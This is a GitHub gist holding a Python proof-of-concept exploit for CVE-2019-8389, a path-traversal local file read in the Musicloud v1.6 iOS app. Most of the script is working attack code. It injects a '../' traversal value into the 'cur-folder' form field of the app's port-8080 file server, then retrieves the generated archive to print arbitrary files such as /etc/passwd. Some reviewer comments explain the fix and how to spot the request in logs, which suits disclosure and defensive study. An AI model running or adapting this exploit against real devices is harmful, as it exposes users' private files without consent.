
@shawarkhanethicalhacker
Last active February 17, 2019 07:44
[CVE-2019-8389] Proof-of-concept exploit code for a local file read vulnerability in the Musicloud v1.6 iOS application
#!/usr/bin/python
# Proof of concept for CVE-2019-8389
# Exploit author: Shawar Khan
import sys
import requests
def usage():
    """Print the expected invocation: target IP address, then the file path to read."""
    help_text = "Usage:\n\tpython musicloud_lfi.py 192.168.8.103 /etc/passwd\n"
    print help_text
# The whole script body sits in one try block so that a missing command-line
# argument (IndexError on sys.argv) ends in usage() at the bottom.
# NOTE(review): indentation was lost on this page; the nesting below is
# reconstructed from the syntax and should be checked against the original gist.
try:
    ip = sys.argv[1]    # first argument: address of the device serving on port 8080
    path = sys.argv[2]  # second argument: absolute path of the file to read
    # Last path component, i.e. the file name.
    downfile = path.split('/')[::-1][0]
    # Directory part of the path, prefixed with seven parent-directory steps.
    # This is the traversal value: it only works because the server uses the
    # "cur-folder" field without confining it to the shared directory.
    cur_fold = '../../../../../../..'+path[:-len(downfile)]
    print '''
Musicloud v1.6 iOS - Local File Read exploit
CVE: CVE-2019-8389
Author: Shawar Khan ( @shawarkhanethicalhacker )
'''
    def create_archive(file,payload):
        """Ask the server to build MusicPlayerArchive.zip from `file` in folder `payload`.

        Sends a POST to /download.script on port 8080 with the form fields
        "downfiles" (file name) and "cur-folder" (folder). Success is judged by
        an HTTP 200 whose body mentions "MusicPlayerArchive.zip"; a 404, any
        other response, or a refused connection prints a message and exits.

        Defensive reading: the server-side fix is to resolve "cur-folder" to a
        canonical path and reject anything outside the shared root. A POST to
        download.script whose "cur-folder" contains ".." is the request to
        look for in traffic or logs.
        """
        post_data = {
            "downfiles" : file,
            "cur-folder" : payload
        }
        print "[+] Injecting Payload..."
        try:
            inj_status = requests.post('http://'+str(ip)+':8080/download.script',data=post_data)
            if "MusicPlayerArchive.zip" in inj_status.text and inj_status.status_code==200:
                print "[+] Payload successfully injected"
            elif inj_status.status_code==404:
                print "[+] Payload injection failed, File not found"
                exit()
            else:
                print "[+] Payload injection failed!"
                exit()
        except(requests.exceptions.ConnectionError) as err:
            print '[+] Payload injection failed! Connection refused.'
            exit()
    def retrieve_content():
        """Download MusicPlayerArchive.zip from the server and print its inner lines.

        Issues a GET for /MusicPlayerArchive.zip on port 8080. On HTTP 200 the
        response body is handled as text, split into lines, trimmed at both
        ends and printed; any other status prints an error message.
        """
        print "[+] Retrieving MusicPlayerArchive.zip"
        zip_content = requests.get('http://'+str(ip)+':8080/MusicPlayerArchive.zip')
        if zip_content.status_code==200:
            print "[+] Successfully retrieved MusicPlayerArchive.zip!\n\n[i] Printing content of %s:\n"%path
            # The archive is not unpacked; its raw body is split into text lines.
            archive = zip_content.text.splitlines()
            # Drop leading and trailing lines, presumably the zip framing around
            # the file data. NOTE(review): assumes both pops belong to the loop
            # body (two lines removed from each end); confirm against the gist.
            for i in range(2):
                archive.pop()
                archive.pop(0)
            print '\n'.join(archive)
        else:
            print "[+] Error retrieving content!"
    # Step 1: have the server archive the requested file; step 2: fetch the archive.
    create_archive(downfile,cur_fold)
    retrieve_content()
except(IndexError):
    # Raised by the sys.argv lookups above when an argument is missing.
    usage()